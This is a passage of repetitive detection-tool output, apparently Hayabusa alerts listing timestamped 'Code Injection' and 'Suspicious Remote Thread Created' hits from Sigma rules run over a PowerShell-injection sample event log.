Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Suspicious Remote Thread 